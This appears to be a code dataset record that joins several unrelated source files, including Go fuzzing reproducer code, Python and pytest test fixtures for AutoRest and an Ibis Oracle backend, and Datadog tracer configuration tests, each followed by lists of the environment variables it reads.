// panic(fmt.Sprintf("for type %v, appending to ec.outputSlots: %#v", outT, ec.outputSlots))
}
}
return args
}
func mustFunc(obj interface{}) reflect.Value {
fv := reflect.ValueOf(obj)
if fv.Kind() != reflect.Func {
panic(fmt.Sprintf("fzgen: Step.Func is not of type func. [kind: %v %%T: %T value: %v]", fv.Kind(), fv, fv))
}
return fv
}
var spinCount int
func spin() {
// TODO: tune duration of spin down?
// It's going to depend on funcs under test and HW and so on, but on one test with logical race that set up a data:
// 1<<16 vs. no spin moved reproducibility from ~80% to ~95%
// 1<<20 moved reproducibility to ~100%
var i int
for i < 1<<18 {
i++
}
spinCount += i
}
var (
debugPrintRepro bool
debugPrintPlan bool
debugPlanVersion int = 2
)
func emitPlan(pl plan.Plan) {
litter.Config.Compact = false
// TODO: Probably use litter.Options object
fmt.Println("PLAN:")
litter.Dump(pl)
fmt.Println()
}
// emitBasicRepro is the start of a more complete standalone reproducer
// creation, which ultimately could be a standalone _test.go file
// that does not have any dependency on fzgen/fuzzer or testing.F.
//
// Example current output, showing:
// - literals for new args filled in by fz.Fill
// - literals for reused args
// - temporary variables when an output val is wired to a later input arg.
//
// Output:
//
// Fuzz_MySafeMap_Load(
// [4]uint8{0,0,0,0},
// )
// __fzCall2Retval1 := Fuzz_MySafeMap_Load(
// [4]uint8{0,0,0,0},
// )
// Fuzz_MySafeMap_Store(
// [4]uint8{0,0,0,0},
// __fzCall2Retval1,
// )
func emitBasicRepro(calls []execCall, sequential bool, startParallelIndex int, stopParallelIndex int) {
litter.Config.Compact = true
// TODO: Probably use litter.Options object
// TODO: litter.Config.HomePackage = "<local pkg>"
for i, ec := range calls {
parallelCall := false
if !sequential && i >= startParallelIndex && i <= stopParallelIndex {
parallelCall = true
}
// TODO: consider emitting spin?
// if i > startParallelIndex && i <= stopParallelIndex {
// fmt.Print("\n\tspin()\n")
// }
if parallelCall && i == startParallelIndex {
if i != 0 {
fmt.Println()
}
fmt.Print("\tvar wg sync.WaitGroup\n")
fmt.Printf("\twg.Add(%d)\n\n", stopParallelIndex-startParallelIndex+1)
fmt.Print("\t// Execute next steps in parallel.\n")
}
if parallelCall {
fmt.Print("\tgo func() {\n")
fmt.Print("\t\tdefer wg.Done()\n")
}
// start emititng the actual call invocation.
if parallelCall {
fmt.Print("\t\t")
} else {
fmt.Print("\t")
}
// check if we are reusing any of return values from this call.
showReturn := false
for _, slot := range ec.outputSlots {
if slot.needed {
showReturn = true
break
}
}
if showReturn {
// emit assignement to return values, which can look like:
// __fzCall2Retval1, _, _ :=
for i, slot := range ec.outputSlots {
if i > 0 {
fmt.Print(", ")
}
if !ec.outputSlots[i].needed {
fmt.Print("_")
} else {
// one-based temp variable names for friendlier output.
fmt.Printf("__fzCall%dRetval%d", slot.returnValCall+1, slot.returnValArg+1)
}
}
fmt.Print(" := ")
}
// emit the args, which might just be literals, or
// might include one or more temp variables for a return value.
fmt.Printf("%s(\n", ec.name)
for _, arg := range ec.args {
if parallelCall {
fmt.Print("\t")
}
if !arg.useReturnVal {
fmt.Printf("\t\t%s,\n", litter.Sdump(arg.val.Interface()))
} else {
// one-based temp variable names for friendlier output.
fmt.Printf("\t\t__fzCall%dRetval%d,\n", arg.slot.returnValCall+1, arg.slot.returnValArg+1)
}
}
// close out the invocation of this call.
if parallelCall {
fmt.Print("\t\t)\n")
fmt.Print("\t}()\n")
} else {
fmt.Print("\t)\n")
}
if parallelCall && i == stopParallelIndex {
fmt.Print("\twg.Wait()\n")
if i < len(calls)-1 {
fmt.Printf("\n\t// Resume sequential execution.\n")
}
}
}
fmt.Println()
}
func init() {
fzgenDebugParse()
}
func fzgenDebugParse() {
debug := strings.Split(os.Getenv("FZDEBUG"), ",")
for _, f := range debug {
if strings.HasPrefix(f, "repro=") {
debugReproVal, err := strconv.Atoi(strings.TrimPrefix(f, "repro="))
if err != nil || debugReproVal > 1 {
panic("unexpected repro value in FZDEBUG env var")
}
if debugReproVal == 1 {
debugPrintRepro = true
}
}
if strings.HasPrefix(f, "plan=") {
debugPlanVal, err := strconv.Atoi(strings.TrimPrefix(f, "plan="))
if err != nil || debugPlanVal > 1 {
panic("unexpected repro value in FZDEBUG env var")
}
if debugPlanVal == 1 {
debugPrintPlan = true
}
}
if strings.HasPrefix(f, "planversion=") {
debugPlanVersion, err := strconv.Atoi(strings.TrimPrefix(f, "planversion="))
if err != nil || debugPlanVersion > 2 {
panic("unexpected planversion value in FZDEBUG env var")
}
}
}
}
|
[
"\"FZDEBUG\""
] |
[] |
[
"FZDEBUG"
] |
[]
|
["FZDEBUG"]
|
go
| 1 | 0 | |
test/vanilla/AcceptanceTests/asynctests/test_datetime_rfc.py
|
# --------------------------------------------------------------------------
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the ""Software""), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
# --------------------------------------------------------------------------
import unittest
import subprocess
import sys
import isodate
import tempfile
import json
from datetime import date, datetime, timedelta
import os
from os.path import dirname, pardir, join, realpath
cwd = dirname(realpath(__file__))
log_level = int(os.environ.get('PythonLogLevel', 30))
tests = realpath(join(cwd, pardir, "Expected", "AcceptanceTests"))
sys.path.append(join(tests, "BodyDateTimeRfc1123"))
from msrest.serialization import Deserializer
from msrest.exceptions import DeserializationError
from bodydatetimerfc1123.aio import AutoRestRFC1123DateTimeTestService
import pytest
class TestDateTimeRfc(object):
@pytest.mark.asyncio
async def test_datetime_rfc(self):
client = AutoRestRFC1123DateTimeTestService(base_url="http://localhost:3000")
assert await client.datetimerfc1123.get_null() is None
with pytest.raises(DeserializationError):
await client.datetimerfc1123.get_invalid()
with pytest.raises(DeserializationError):
await client.datetimerfc1123.get_underflow()
with pytest.raises(DeserializationError):
await client.datetimerfc1123.get_overflow()
await client.datetimerfc1123.get_utc_lowercase_max_date_time()
await client.datetimerfc1123.get_utc_uppercase_max_date_time()
await client.datetimerfc1123.get_utc_min_date_time()
max_date = isodate.parse_datetime("9999-12-31T23:59:59.999999Z")
await client.datetimerfc1123.put_utc_max_date_time(max_date)
min_date = isodate.parse_datetime("0001-01-01T00:00:00Z")
await client.datetimerfc1123.put_utc_min_date_time(min_date)
|
[] |
[] |
[
"PythonLogLevel"
] |
[]
|
["PythonLogLevel"]
|
python
| 1 | 0 | |
third_party/ibis/ibis_oracle/tests/conftest.py
|
# Copyright 2020 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pytest
import ibis
import third_party.ibis.ibis_oracle.api
OL_HOST= os.environ.get(
'IBIS_TEST_ORACLE_HOST', os.environ.get('OLHOST','host')
)
OL_PORT= os.environ.get(
'IBIS_TEST_ORACLE_PORT', os.environ.get('OLPORT','port')
)
OL_USER = os.environ.get(
'IBIS_TEST_ORACLE_USER', os.environ.get('OLUSER', 'username')
)
OL_PASS = os.environ.get(
'IBIS_TEST_ORACLE_PASSWORD', os.environ.get('OLPASSWORD', 'password')
)
IBIS_TEST_ORACLE_DB = os.environ.get(
'IBIS_TEST_ORACLE_DATABASE', os.environ.get('OLDATABASE', 'database_name')
)
IBIS_TEST_ORACLE_protocol = os.environ.get(
'IBIS_TEST_ORACLE_PROTOCOL', os.environ.get('OLPROTOCOL', 'protocol')
)
def _random_identifier(suffix):
return '__ibis_test_{}_{}'.format(suffix, ibis.util.guid())
@pytest.fixture(scope='session')
def con():
return third_party.ibis.ibis_oracle.api.connect(
host=OL_HOST,
port=OL_PORT,
user=OL_USER,
password=OL_PASS,
database=IBIS_TEST_ORACLE_DB,
protocol=IBIS_TEST_ORACLE_protocol,
)
@pytest.fixture(scope='module')
def db(con):
return con.database()
@pytest.fixture(scope='module')
def alltypes(db):
return db.functional_alltypes
@pytest.fixture(scope='module')
def df(alltypes):
return alltypes.execute()
@pytest.fixture(scope='module')
def at(alltypes):
return alltypes.op().sqla_table
@pytest.fixture(scope='module')
def intervals(con):
return con.table("intervals")
@pytest.fixture
def translate():
from third_party.ibis.ibis_oracle.compiler import OracleDialect
dialect = OracleDialect()
context = dialect.make_context()
return lambda expr: dialect.translator(expr, context).get_result()
@pytest.fixture
def temp_table(con) -> str:
"""
Return a temporary table name.
Parameters
----------
con : third_party.ibis.ibis_oracle.compiler.OracleDialect
Yields
------
name : string
Random table name for a temporary usage.
"""
name = _random_identifier('table')
try:
yield name
finally:
con.drop_table(name, force=True)
|
[] |
[] |
[
"OLPORT",
"IBIS_TEST_ORACLE_HOST",
"OLDATABASE",
"OLHOST",
"IBIS_TEST_ORACLE_USER",
"OLUSER",
"IBIS_TEST_ORACLE_PASSWORD",
"IBIS_TEST_ORACLE_PROTOCOL",
"OLPASSWORD",
"IBIS_TEST_ORACLE_DATABASE",
"OLPROTOCOL",
"IBIS_TEST_ORACLE_PORT"
] |
[]
|
["OLPORT", "IBIS_TEST_ORACLE_HOST", "OLDATABASE", "OLHOST", "IBIS_TEST_ORACLE_USER", "OLUSER", "IBIS_TEST_ORACLE_PASSWORD", "IBIS_TEST_ORACLE_PROTOCOL", "OLPASSWORD", "IBIS_TEST_ORACLE_DATABASE", "OLPROTOCOL", "IBIS_TEST_ORACLE_PORT"]
|
python
| 12 | 0 | |
ddtrace/tracer/option_test.go
|
// Unless explicitly stated otherwise all files in this repository are licensed
// under the Apache License Version 2.0.
// This product includes software developed at Datadog (https://www.datadoghq.com/).
// Copyright 2016 Datadog, Inc.
package tracer
import (
"io"
"io/ioutil"
"math"
"net"
"net/http"
"net/http/httptest"
"os"
"path/filepath"
"runtime"
"strings"
"testing"
"time"
"gopkg.in/DataDog/dd-trace-go.v1/internal/globalconfig"
"gopkg.in/DataDog/dd-trace-go.v1/internal/traceprof"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
func withTransport(t transport) StartOption {
return func(c *config) {
c.transport = t
}
}
func withTickChan(ch <-chan time.Time) StartOption {
return func(c *config) {
c.tickChan = ch
}
}
// testStatsd asserts that the given statsd.Client can successfully send metrics
// to a UDP listener located at addr.
func testStatsd(t *testing.T, cfg *config, addr string) {
client := cfg.statsd
require.Equal(t, addr, cfg.dogstatsdAddr)
udpaddr, err := net.ResolveUDPAddr("udp", addr)
require.NoError(t, err)
conn, err := net.ListenUDP("udp", udpaddr)
require.NoError(t, err)
defer conn.Close()
client.Count("name", 1, []string{"tag"}, 1)
require.NoError(t, client.Close())
done := make(chan struct{})
buf := make([]byte, 4096)
n := 0
go func() {
n, _ = io.ReadAtLeast(conn, buf, 1)
close(done)
}()
select {
case <-done:
// OK
case <-time.After(1 * time.Second):
require.Fail(t, "No data was flushed.")
}
assert.Contains(t, string(buf[:n]), "name:1|c|#lang:go")
}
func TestAutoDetectStatsd(t *testing.T) {
t.Run("default", func(t *testing.T) {
testStatsd(t, newConfig(), net.JoinHostPort(defaultHostname, "8125"))
})
t.Run("socket", func(t *testing.T) {
if strings.HasPrefix(runtime.GOOS, "windows") {
t.Skip("Unix only")
}
if testing.Short() {
return
}
dir, err := ioutil.TempDir("", "socket")
if err != nil {
t.Fatal(err)
}
addr := filepath.Join(dir, "dsd.socket")
defer func(old string) { defaultSocketDSD = old }(defaultSocketDSD)
defaultSocketDSD = addr
uaddr, err := net.ResolveUnixAddr("unixgram", addr)
if err != nil {
t.Fatal(err)
}
conn, err := net.ListenUnixgram("unixgram", uaddr)
if err != nil {
t.Fatal(err)
}
defer conn.Close()
conn.SetDeadline(time.Now().Add(5 * time.Second))
cfg := newConfig()
require.Equal(t, cfg.dogstatsdAddr, "unix://"+addr)
cfg.statsd.Count("name", 1, []string{"tag"}, 1)
buf := make([]byte, 17)
n, err := conn.Read(buf)
if err != nil {
t.Fatal(err)
}
require.Contains(t, string(buf[:n]), "name:1|c|#lang:go")
})
t.Run("env", func(t *testing.T) {
defer func(old string) { os.Setenv("DD_DOGSTATSD_PORT", old) }(os.Getenv("DD_DOGSTATSD_PORT"))
os.Setenv("DD_DOGSTATSD_PORT", "8111")
testStatsd(t, newConfig(), net.JoinHostPort(defaultHostname, "8111"))
})
t.Run("agent", func(t *testing.T) {
t.Run("default", func(t *testing.T) {
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
w.Write([]byte(`{"statsd_port":0}`))
}))
defer srv.Close()
cfg := newConfig(WithAgentAddr(strings.TrimPrefix(srv.URL, "http://")))
testStatsd(t, cfg, net.JoinHostPort(defaultHostname, "8125"))
})
t.Run("port", func(t *testing.T) {
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
w.Write([]byte(`{"statsd_port":8999}`))
}))
defer srv.Close()
cfg := newConfig(WithAgentAddr(strings.TrimPrefix(srv.URL, "http://")))
testStatsd(t, cfg, net.JoinHostPort(defaultHostname, "8999"))
})
})
}
func TestLoadAgentFeatures(t *testing.T) {
t.Run("zero", func(t *testing.T) {
t.Run("disabled", func(t *testing.T) {
assert.Zero(t, newConfig(WithLambdaMode(true)).agent)
})
t.Run("unreachable", func(t *testing.T) {
if testing.Short() {
return
}
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
w.WriteHeader(http.StatusInternalServerError)
}))
defer srv.Close()
assert.Zero(t, newConfig(WithAgentAddr("127.9.9.9:8181")).agent)
})
t.Run("StatusNotFound", func(t *testing.T) {
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
w.WriteHeader(http.StatusNotFound)
}))
defer srv.Close()
assert.Zero(t, newConfig(WithAgentAddr(strings.TrimPrefix(srv.URL, "http://"))).agent)
})
t.Run("error", func(t *testing.T) {
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
w.Write([]byte("Not JSON"))
}))
defer srv.Close()
assert.Zero(t, newConfig(WithAgentAddr(strings.TrimPrefix(srv.URL, "http://"))).agent)
})
})
t.Run("OK", func(t *testing.T) {
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
w.Write([]byte(`{"endpoints":["/v0.6/stats"],"feature_flags":["a","b"],"client_drop_p0s":true,"statsd_port":8999}`))
}))
defer srv.Close()
cfg := newConfig(WithAgentAddr(strings.TrimPrefix(srv.URL, "http://")))
assert.True(t, cfg.agent.DropP0s)
assert.Equal(t, cfg.agent.StatsdPort, 8999)
assert.EqualValues(t, cfg.agent.featureFlags, map[string]struct{}{
"a": struct{}{},
"b": struct{}{},
})
assert.True(t, cfg.agent.Stats)
assert.True(t, cfg.agent.HasFlag("a"))
assert.True(t, cfg.agent.HasFlag("b"))
})
t.Run("discovery", func(t *testing.T) {
defer func(old string) { os.Setenv("DD_TRACE_FEATURES", old) }(os.Getenv("DD_TRACE_FEATURES"))
os.Setenv("DD_TRACE_FEATURES", "discovery")
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
w.Write([]byte(`{"endpoints":["/v0.6/stats"],"client_drop_p0s":true,"statsd_port":8999}`))
}))
defer srv.Close()
cfg := newConfig(WithAgentAddr(strings.TrimPrefix(srv.URL, "http://")))
assert.True(t, cfg.agent.DropP0s)
assert.True(t, cfg.agent.Stats)
assert.Equal(t, cfg.agent.StatsdPort, 8999)
})
}
func TestTracerOptionsDefaults(t *testing.T) {
t.Run("defaults", func(t *testing.T) {
assert := assert.New(t)
c := newConfig()
assert.Equal(float64(1), c.sampler.(RateSampler).Rate())
assert.Equal("tracer.test", c.serviceName)
assert.Equal("localhost:8126", c.agentAddr)
assert.Equal("localhost:8125", c.dogstatsdAddr)
assert.Nil(nil, c.httpClient)
assert.Equal(defaultClient, c.httpClient)
})
t.Run("http-client", func(t *testing.T) {
c := newConfig()
assert.Equal(t, defaultClient, c.httpClient)
client := &http.Client{}
WithHTTPClient(client)(c)
assert.Equal(t, client, c.httpClient)
})
t.Run("analytics", func(t *testing.T) {
t.Run("option", func(t *testing.T) {
defer globalconfig.SetAnalyticsRate(math.NaN())
assert := assert.New(t)
assert.True(math.IsNaN(globalconfig.AnalyticsRate()))
newTracer(WithAnalyticsRate(0.5))
assert.Equal(0.5, globalconfig.AnalyticsRate())
newTracer(WithAnalytics(false))
assert.True(math.IsNaN(globalconfig.AnalyticsRate()))
newTracer(WithAnalytics(true))
assert.Equal(1., globalconfig.AnalyticsRate())
})
t.Run("env/on", func(t *testing.T) {
os.Setenv("DD_TRACE_ANALYTICS_ENABLED", "true")
defer os.Unsetenv("DD_TRACE_ANALYTICS_ENABLED")
defer globalconfig.SetAnalyticsRate(math.NaN())
newConfig()
assert.Equal(t, 1.0, globalconfig.AnalyticsRate())
})
t.Run("env/off", func(t *testing.T) {
os.Setenv("DD_TRACE_ANALYTICS_ENABLED", "kj12")
defer os.Unsetenv("DD_TRACE_ANALYTICS_ENABLED")
defer globalconfig.SetAnalyticsRate(math.NaN())
newConfig()
assert.True(t, math.IsNaN(globalconfig.AnalyticsRate()))
})
})
t.Run("dogstatsd", func(t *testing.T) {
t.Run("default", func(t *testing.T) {
tracer := newTracer()
c := tracer.config
assert.Equal(t, c.dogstatsdAddr, "localhost:8125")
})
t.Run("env-host", func(t *testing.T) {
os.Setenv("DD_AGENT_HOST", "my-host")
defer os.Unsetenv("DD_AGENT_HOST")
tracer := newTracer()
c := tracer.config
assert.Equal(t, c.dogstatsdAddr, "my-host:8125")
})
t.Run("env-port", func(t *testing.T) {
os.Setenv("DD_DOGSTATSD_PORT", "123")
defer os.Unsetenv("DD_DOGSTATSD_PORT")
tracer := newTracer()
c := tracer.config
assert.Equal(t, c.dogstatsdAddr, "localhost:123")
})
t.Run("env-both", func(t *testing.T) {
os.Setenv("DD_AGENT_HOST", "my-host")
os.Setenv("DD_DOGSTATSD_PORT", "123")
defer os.Unsetenv("DD_AGENT_HOST")
defer os.Unsetenv("DD_DOGSTATSD_PORT")
tracer := newTracer()
c := tracer.config
assert.Equal(t, c.dogstatsdAddr, "my-host:123")
})
t.Run("env-env", func(t *testing.T) {
os.Setenv("DD_ENV", "testEnv")
defer os.Unsetenv("DD_ENV")
tracer := newTracer()
c := tracer.config
assert.Equal(t, "testEnv", c.env)
})
t.Run("option", func(t *testing.T) {
tracer := newTracer(WithDogstatsdAddress("10.1.0.12:4002"))
c := tracer.config
assert.Equal(t, c.dogstatsdAddr, "10.1.0.12:4002")
})
})
t.Run("env-agentAddr", func(t *testing.T) {
os.Setenv("DD_AGENT_HOST", "trace-agent")
defer os.Unsetenv("DD_AGENT_HOST")
tracer := newTracer()
c := tracer.config
assert.Equal(t, "trace-agent:8126", c.agentAddr)
})
t.Run("override", func(t *testing.T) {
os.Setenv("DD_ENV", "dev")
defer os.Unsetenv("DD_ENV")
assert := assert.New(t)
env := "production"
tracer := newTracer(WithEnv(env))
c := tracer.config
assert.Equal(env, c.env)
})
t.Run("trace_enabled", func(t *testing.T) {
t.Run("default", func(t *testing.T) {
tracer := newTracer()
c := tracer.config
assert.True(t, c.enabled)
})
t.Run("override", func(t *testing.T) {
os.Setenv("DD_TRACE_ENABLED", "false")
defer os.Unsetenv("DD_TRACE_ENABLED")
tracer := newTracer()
c := tracer.config
assert.False(t, c.enabled)
})
})
t.Run("other", func(t *testing.T) {
assert := assert.New(t)
tracer := newTracer(
WithSampler(NewRateSampler(0.5)),
WithAgentAddr("ddagent.consul.local:58126"),
WithGlobalTag("k", "v"),
WithDebugMode(true),
WithEnv("testEnv"),
)
c := tracer.config
assert.Equal(float64(0.5), c.sampler.(RateSampler).Rate())
assert.Equal("ddagent.consul.local:58126", c.agentAddr)
assert.NotNil(c.globalTags)
assert.Equal("v", c.globalTags["k"])
assert.Equal("testEnv", c.env)
assert.True(c.debug)
})
t.Run("env-tags", func(t *testing.T) {
os.Setenv("DD_TAGS", "env:test, aKey:aVal,bKey:bVal, cKey:")
defer os.Unsetenv("DD_TAGS")
assert := assert.New(t)
c := newConfig()
assert.Equal("test", c.globalTags["env"])
assert.Equal("aVal", c.globalTags["aKey"])
assert.Equal("bVal", c.globalTags["bKey"])
assert.Equal("", c.globalTags["cKey"])
dVal, ok := c.globalTags["dKey"]
assert.False(ok)
assert.Equal(nil, dVal)
})
t.Run("profiler-endpoints", func(t *testing.T) {
t.Run("default", func(t *testing.T) {
c := newConfig()
assert.False(t, c.profilerEndpoints)
})
t.Run("override", func(t *testing.T) {
os.Setenv(traceprof.EndpointEnvVar, "true")
defer os.Unsetenv(traceprof.EndpointEnvVar)
c := newConfig()
assert.True(t, c.profilerEndpoints)
})
})
t.Run("profiler-hotspots", func(t *testing.T) {
t.Run("default", func(t *testing.T) {
c := newConfig()
assert.False(t, c.profilerHotspots)
})
t.Run("override", func(t *testing.T) {
os.Setenv(traceprof.CodeHotspotsEnvVar, "true")
defer os.Unsetenv(traceprof.CodeHotspotsEnvVar)
c := newConfig()
assert.True(t, c.profilerHotspots)
})
})
t.Run("env-mapping", func(t *testing.T) {
os.Setenv("DD_SERVICE_MAPPING", "tracer.test:test2, svc:Newsvc,http.router:myRouter, noval:")
defer os.Unsetenv("DD_SERVICE_MAPPING")
assert := assert.New(t)
c := newConfig()
assert.Equal("test2", c.serviceMappings["tracer.test"])
assert.Equal("Newsvc", c.serviceMappings["svc"])
assert.Equal("myRouter", c.serviceMappings["http.router"])
assert.Equal("", c.serviceMappings["noval"])
})
}
func TestDefaultHTTPClient(t *testing.T) {
t.Run("no-socket", func(t *testing.T) {
assert.Equal(t, defaultHTTPClient(), defaultClient)
})
t.Run("socket", func(t *testing.T) {
f, err := ioutil.TempFile("", "apm.socket")
if err != nil {
t.Fatal(err)
}
if err := f.Close(); err != nil {
t.Fatal(err)
}
defer os.RemoveAll(f.Name())
defer func(old string) { defaultSocketAPM = old }(defaultSocketAPM)
defaultSocketAPM = f.Name()
assert.NotEqual(t, defaultHTTPClient(), defaultClient)
})
}
func TestDefaultDogstatsdAddr(t *testing.T) {
t.Run("no-socket", func(t *testing.T) {
assert.Equal(t, defaultDogstatsdAddr(), "localhost:8125")
})
t.Run("env", func(t *testing.T) {
defer func(old string) { os.Setenv("DD_DOGSTATSD_PORT", old) }(os.Getenv("DD_DOGSTATSD_PORT"))
os.Setenv("DD_DOGSTATSD_PORT", "8111")
assert.Equal(t, defaultDogstatsdAddr(), "localhost:8111")
})
t.Run("env+socket", func(t *testing.T) {
defer func(old string) { os.Setenv("DD_DOGSTATSD_PORT", old) }(os.Getenv("DD_DOGSTATSD_PORT"))
os.Setenv("DD_DOGSTATSD_PORT", "8111")
assert.Equal(t, defaultDogstatsdAddr(), "localhost:8111")
f, err := ioutil.TempFile("", "dsd.socket")
if err != nil {
t.Fatal(err)
}
if err := f.Close(); err != nil {
t.Fatal(err)
}
defer os.RemoveAll(f.Name())
defer func(old string) { defaultSocketDSD = old }(defaultSocketDSD)
defaultSocketDSD = f.Name()
assert.Equal(t, defaultDogstatsdAddr(), "localhost:8111")
})
t.Run("socket", func(t *testing.T) {
defer func(old string) { os.Setenv("DD_AGENT_HOST", old) }(os.Getenv("DD_AGENT_HOST"))
defer func(old string) { os.Setenv("DD_DOGSTATSD_PORT", old) }(os.Getenv("DD_DOGSTATSD_PORT"))
os.Unsetenv("DD_AGENT_HOST")
os.Unsetenv("DD_DOGSTATSD_PORT")
f, err := ioutil.TempFile("", "dsd.socket")
if err != nil {
t.Fatal(err)
}
if err := f.Close(); err != nil {
t.Fatal(err)
}
defer os.RemoveAll(f.Name())
defer func(old string) { defaultSocketDSD = old }(defaultSocketDSD)
defaultSocketDSD = f.Name()
assert.Equal(t, defaultDogstatsdAddr(), "unix://"+f.Name())
})
}
func TestServiceName(t *testing.T) {
t.Run("WithServiceName", func(t *testing.T) {
defer globalconfig.SetServiceName("")
assert := assert.New(t)
c := newConfig(
WithServiceName("api-intake"),
)
assert.Equal("api-intake", c.serviceName)
assert.Equal("", globalconfig.ServiceName())
})
t.Run("WithService", func(t *testing.T) {
defer globalconfig.SetServiceName("")
assert := assert.New(t)
c := newConfig(
WithService("api-intake"),
)
assert.Equal("api-intake", c.serviceName)
assert.Equal("api-intake", globalconfig.ServiceName())
})
t.Run("env", func(t *testing.T) {
defer globalconfig.SetServiceName("")
os.Setenv("DD_SERVICE", "api-intake")
defer os.Unsetenv("DD_SERVICE")
assert := assert.New(t)
c := newConfig()
assert.Equal("api-intake", c.serviceName)
assert.Equal("api-intake", globalconfig.ServiceName())
})
t.Run("WithGlobalTag", func(t *testing.T) {
defer globalconfig.SetServiceName("")
assert := assert.New(t)
c := newConfig(WithGlobalTag("service", "api-intake"))
assert.Equal("api-intake", c.serviceName)
assert.Equal("api-intake", globalconfig.ServiceName())
})
t.Run("DD_TAGS", func(t *testing.T) {
defer globalconfig.SetServiceName("")
os.Setenv("DD_TAGS", "service:api-intake")
defer os.Unsetenv("DD_TAGS")
assert := assert.New(t)
c := newConfig()
assert.Equal("api-intake", c.serviceName)
assert.Equal("api-intake", globalconfig.ServiceName())
})
t.Run("override-chain", func(t *testing.T) {
assert := assert.New(t)
globalconfig.SetServiceName("")
c := newConfig()
assert.Equal(c.serviceName, filepath.Base(os.Args[0]))
assert.Equal("", globalconfig.ServiceName())
os.Setenv("DD_TAGS", "service:testService")
defer os.Unsetenv("DD_TAGS")
globalconfig.SetServiceName("")
c = newConfig()
assert.Equal(c.serviceName, "testService")
assert.Equal("testService", globalconfig.ServiceName())
globalconfig.SetServiceName("")
c = newConfig(WithGlobalTag("service", "testService2"))
assert.Equal(c.serviceName, "testService2")
assert.Equal("testService2", globalconfig.ServiceName())
os.Setenv("DD_SERVICE", "testService3")
defer os.Unsetenv("DD_SERVICE")
globalconfig.SetServiceName("")
c = newConfig(WithGlobalTag("service", "testService2"))
assert.Equal(c.serviceName, "testService3")
assert.Equal("testService3", globalconfig.ServiceName())
globalconfig.SetServiceName("")
c = newConfig(WithGlobalTag("service", "testService2"), WithService("testService4"))
assert.Equal(c.serviceName, "testService4")
assert.Equal("testService4", globalconfig.ServiceName())
})
}
func TestTagSeparators(t *testing.T) {
assert := assert.New(t)
for _, tag := range []struct {
in string
out map[string]string
}{{
in: "env:test aKey:aVal bKey:bVal cKey:",
out: map[string]string{
"env": "test",
"aKey": "aVal",
"bKey": "bVal",
"cKey": "",
},
},
{
in: "env:test,aKey:aVal,bKey:bVal,cKey:",
out: map[string]string{
"env": "test",
"aKey": "aVal",
"bKey": "bVal",
"cKey": "",
},
},
{
in: "env:test,aKey:aVal bKey:bVal cKey:",
out: map[string]string{
"env": "test",
"aKey": "aVal bKey:bVal cKey:",
},
},
{
in: "env:test bKey :bVal dKey: dVal cKey:",
out: map[string]string{
"env": "test",
"bKey": "",
"dKey": "",
"dVal": "",
"cKey": "",
},
},
{
in: "env :test, aKey : aVal bKey:bVal cKey:",
out: map[string]string{
"env": "test",
"aKey": "aVal bKey:bVal cKey:",
},
},
{
in: "env:keyWithA:Semicolon bKey:bVal cKey",
out: map[string]string{
"env": "keyWithA:Semicolon",
"bKey": "bVal",
"cKey": "",
},
},
{
in: "env:keyWith: , , Lots:Of:Semicolons ",
out: map[string]string{
"env": "keyWith:",
"Lots": "Of:Semicolons",
},
},
{
in: "a:b,c,d",
out: map[string]string{
"a": "b",
"c": "",
"d": "",
},
},
{
in: "a,1",
out: map[string]string{
"a": "",
"1": "",
},
},
{
in: "a:b:c:d",
out: map[string]string{"a": "b:c:d"},
},
} {
t.Run("", func(t *testing.T) {
os.Setenv("DD_TAGS", tag.in)
defer os.Unsetenv("DD_TAGS")
c := newConfig()
for key, expected := range tag.out {
got, ok := c.globalTags[key]
assert.True(ok, "tag not found")
assert.Equal(expected, got)
}
})
}
}
func TestVersionConfig(t *testing.T) {
t.Run("WithServiceVersion", func(t *testing.T) {
assert := assert.New(t)
c := newConfig(
WithServiceVersion("1.2.3"),
)
assert.Equal("1.2.3", c.version)
})
t.Run("env", func(t *testing.T) {
os.Setenv("DD_VERSION", "1.2.3")
defer os.Unsetenv("DD_VERSION")
assert := assert.New(t)
c := newConfig()
assert.Equal("1.2.3", c.version)
})
t.Run("WithGlobalTag", func(t *testing.T) {
assert := assert.New(t)
c := newConfig(WithGlobalTag("version", "1.2.3"))
assert.Equal("1.2.3", c.version)
})
t.Run("DD_TAGS", func(t *testing.T) {
os.Setenv("DD_TAGS", "version:1.2.3")
defer os.Unsetenv("DD_TAGS")
assert := assert.New(t)
c := newConfig()
assert.Equal("1.2.3", c.version)
})
t.Run("override-chain", func(t *testing.T) {
assert := assert.New(t)
c := newConfig()
assert.Equal(c.version, "")
os.Setenv("DD_TAGS", "version:1.1.1")
